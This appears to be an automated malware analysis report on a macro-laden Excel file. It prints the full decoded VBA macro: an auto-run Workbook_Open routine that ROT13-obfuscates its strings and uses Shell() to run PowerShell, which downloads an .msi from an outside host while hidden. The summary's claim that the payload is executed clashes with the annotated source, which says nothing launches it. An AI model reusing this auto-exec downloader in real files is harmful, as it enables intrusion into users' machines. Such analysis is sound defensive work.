Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1992414fd8da639e…

MALICIOUS

Office (OOXML)

16.8 KB Created: 2021-06-05 13:17:07 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 1a01134593ab24ac4740b58a6400ab6b SHA-1: af84a041f048ff94c470da3c0f3d09ee83313cf5 SHA-256: 1992414fd8da639e6cde2aa0eb9e11d08e99ca8c0d980b0c2b5ea8bfa9e10e53
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The VBA macro contains a Workbook_Open subroutine that executes commands through the Shell() function. The launched command is used to download a payload from 'uggcf://gur.rnegu.yv/~ftgngunz/chggl/yngrfg/j64/chggl-64ovg-0.75-vafgnyyre.zfv' and save it as 'P:\Grzc\chggl.zfv'. It then executes this payload. The macro also attempts to open a hyperlink to 'uggcf://lbhghor.pbz'. The deobfuscation function `n7777c5f8fe06f5508c82b4c40a1ba1d3` appears to be a ROT13 cipher, which is commonly used to obfuscate malicious strings.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3771 bytes
SHA-256: efd6944bfe2c5add5f773d00867075215bfaf978a48efb125756f55efe0d6926
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-executing entry point. This procedure lives in the ThisWorkbook document
' module (VB_Name above), so Excel runs it as soon as macros are enabled; no
' further user interaction is needed (maps to the OLE_VBA_WBOPEN heuristic).
' Every string literal below is stored ROT13-encoded and passed through
' n7777c5f8fe06f5508c82b4c40a1ba1d3 just before use; the decoded plaintext is
' given in the comments so an analyst does not have to re-derive it.
Sub Workbook_Open()
Dim m78258c303355e10d5773649cef0e17c5 As String
' "argfgng" ROT13-decodes to "netstat" (a command line, not a file path).
m78258c303355e10d5773649cef0e17c5 = "argfgng"
m78258c303355e10d5773649cef0e17c5 = n7777c5f8fe06f5508c82b4c40a1ba1d3(m78258c303355e10d5773649cef0e17c5)
Dim b16b23315a50f3780c5c7071abc30a0a8 As String
' ROT13-decodes to a PowerShell one-liner:
'   invoke-webrequest -Uri 'https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.75-installer.msi'
'     -OutFile 'C:\Temp\putty.msi' -UseDefaultCredentials
' i.e. a download-to-disk of an .msi; -UseDefaultCredentials sends the current
' user's Windows credentials if the server challenges for them.
b16b23315a50f3780c5c7071abc30a0a8 = "vaibxr-jroerdhrfg -Hev 'uggcf://gur.rnegu.yv/~ftgngunz/chggl/yngrfg/j64/chggl-64ovg-0.75-vafgnyyre.zfv' -BhgSvyr 'P:\Grzc\chggl.zfv' -HfrQrsnhygPerqragvnyf"
b16b23315a50f3780c5c7071abc30a0a8 = n7777c5f8fe06f5508c82b4c40a1ba1d3(b16b23315a50f3780c5c7071abc30a0a8)
Dim na97e0af8d92b5dece0273ab821e993a3 As String
' ROT13-decodes to the PowerShell host used for both Shell() launches:
'   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
na97e0af8d92b5dece0273ab821e993a3 = "P:\Jvaqbjf\Flfgrz32\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr"
na97e0af8d92b5dece0273ab821e993a3 = n7777c5f8fe06f5508c82b4c40a1ba1d3(na97e0af8d92b5dece0273ab821e993a3)
' Both helpers take (command line, executable) and call
' Shell("<powershell.exe>" "<command line>"). The first runs the netstat command
' in a visible window (vbNormalFocus); the second runs the download with the
' window hidden (vbHide). Detection note: the parent of both powershell.exe
' processes is EXCEL.EXE. Neither helper, and no other statement in this
' module, launches the downloaded .msi — the on-disk file at C:\Temp\putty.msi
' is the last observable step in the visible source.
Call ed2795a63bfcb3361e2135a5d3c97e498(m78258c303355e10d5773649cef0e17c5, na97e0af8d92b5dece0273ab821e993a3)
Call cceb3b6c6e541ad211de0e097431e32dc(b16b23315a50f3780c5c7071abc30a0a8, na97e0af8d92b5dece0273ab821e993a3)
Dim r2c7fc27bbae458e90bca434c265a3016 As String
' "uggcf://lbhghor.pbz" ROT13-decodes to "https://youtube.com". It is opened in
' the default browser after the shell activity — presumably a decoy so the user
' sees something benign happen; the source gives no other use for it.
r2c7fc27bbae458e90bca434c265a3016 = "uggcf://lbhghor.pbz"
r2c7fc27bbae458e90bca434c265a3016 = n7777c5f8fe06f5508c82b4c40a1ba1d3(r2c7fc27bbae458e90bca434c265a3016)
ActiveWorkbook.FollowHyperlink Address:=r2c7fc27bbae458e90bca434c265a3016
End Sub
' Launches an external program via Shell() with a visible window (vbNormalFocus).
' Parameters: t0d82028f15596d5afc51c2d0fc9fad8f is the command-line string,
' e4d103366b2c0dcd16b291e93d75211ad the executable path — note the order is
' reversed relative to how Shell() consumes them. The copy-to-locals step adds
' nothing functionally; the Shell() line is the one that matters for detection
' (OLE_VBA_SHELL). Identical to cceb3b6c6e541ad211de0e097431e32dc except that
' the window is shown rather than hidden.
Private Sub ed2795a63bfcb3361e2135a5d3c97e498(t0d82028f15596d5afc51c2d0fc9fad8f As String, e4d103366b2c0dcd16b291e93d75211ad As String)
Dim q0814e146cac4aa4983eac5ba4a62626b As String
Dim x739a9ebffab684dbf105d2a6ed29c0a3 As String
' q… = executable path, x… = its argument string.
q0814e146cac4aa4983eac5ba4a62626b = e4d103366b2c0dcd16b291e93d75211ad
x739a9ebffab684dbf105d2a6ed29c0a3 = t0d82028f15596d5afc51c2d0fc9fad8f
' Builds  "<q>" "<x>"  — both parts wrapped in double quotes — and runs it.
Call Shell("""" & q0814e146cac4aa4983eac5ba4a62626b & """ """ & x739a9ebffab684dbf105d2a6ed29c0a3 & """", vbNormalFocus)
End Sub
' Launches an external program via Shell() with the window hidden (vbHide), so
' the user sees no console for the command. Parameters: t0d82028f15596d5afc51c2d0fc9fad8f
' is the command-line string, e4d103366b2c0dcd16b291e93d75211ad the executable
' path (reversed relative to how Shell() consumes them). Same body as
' ed2795a63bfcb3361e2135a5d3c97e498 apart from the window style; the two
' helpers look like a single template stamped out twice.
Private Sub cceb3b6c6e541ad211de0e097431e32dc(t0d82028f15596d5afc51c2d0fc9fad8f As String, e4d103366b2c0dcd16b291e93d75211ad As String)
Dim q0814e146cac4aa4983eac5ba4a62626b As String
Dim x739a9ebffab684dbf105d2a6ed29c0a3 As String
' q… = executable path, x… = its argument string.
q0814e146cac4aa4983eac5ba4a62626b = e4d103366b2c0dcd16b291e93d75211ad
x739a9ebffab684dbf105d2a6ed29c0a3 = t0d82028f15596d5afc51c2d0fc9fad8f
' Builds  "<q>" "<x>"  — both parts wrapped in double quotes — and runs it hidden.
Call Shell("""" & q0814e146cac4aa4983eac5ba4a62626b & """ """ & x739a9ebffab684dbf105d2a6ed29c0a3 & """", vbHide)
End Sub
' ROT13 decoder used for every obfuscated string in this module.
' The lookup table is the lowercase alphabet written twice followed by the
' uppercase alphabet written twice. InStr() returns the FIRST occurrence of a
' letter (positions 1–26 or 53–78), so the character 13 positions further on
' is its ROT13 counterpart and stays in the same case. Characters absent from
' the table (digits, '.', '/', '\', ':', '-', quotes, spaces) are copied
' through unchanged, which is why the encoded URLs and paths keep their shape.
' ROT13 is self-inverse: feeding a decoded string back in re-encodes it, so an
' analyst can recover plaintext with any ROT13 tool. Note that iChar is never
' declared (no Option Explicit in the extracted source), so it is an implicit
' Variant — harmless here, but a tell that the code was machine-generated or
' carelessly written.
Private Function n7777c5f8fe06f5508c82b4c40a1ba1d3(sText)
Const b2359b705477c8ec8a375f34e388839bc = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
' v647… accumulates the output (untyped, so Variant; starts Empty and becomes a
' String on first concatenation); tc9e… is the 1-based loop index into sText.
Dim v647d91d9168d4998b0a669142f3373e3, tc9e8e18c69d0fe80fa11439e97a04928
For tc9e8e18c69d0fe80fa11439e97a04928 = 1 To Len(sText)
' Position of the current character in the table, or 0 if it is not a letter.
iChar = InStr(b2359b705477c8ec8a375f34e388839bc, Mid(sText, tc9e8e18c69d0fe80fa11439e97a04928, 1))
If iChar = 0 Then
' Non-letter: pass through unchanged.
v647d91d9168d4998b0a669142f3373e3 = v647d91d9168d4998b0a669142f3373e3 & Mid(sText, tc9e8e18c69d0fe80fa11439e97a04928, 1)
Else
' Letter: take the character 13 slots later in the doubled alphabet.
v647d91d9168d4998b0a669142f3373e3 = v647d91d9168d4998b0a669142f3373e3 & Mid(b2359b705477c8ec8a375f34e388839bc, iChar + 13, 1)
End If
Next
n7777c5f8fe06f5508c82b4c40a1ba1d3 = v647d91d9168d4998b0a669142f3373e3
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 22528 bytes
SHA-256: cdf4cf0edc6432eef678373c87cb3ec15f89f143d2f4614083e34a72e0a25b61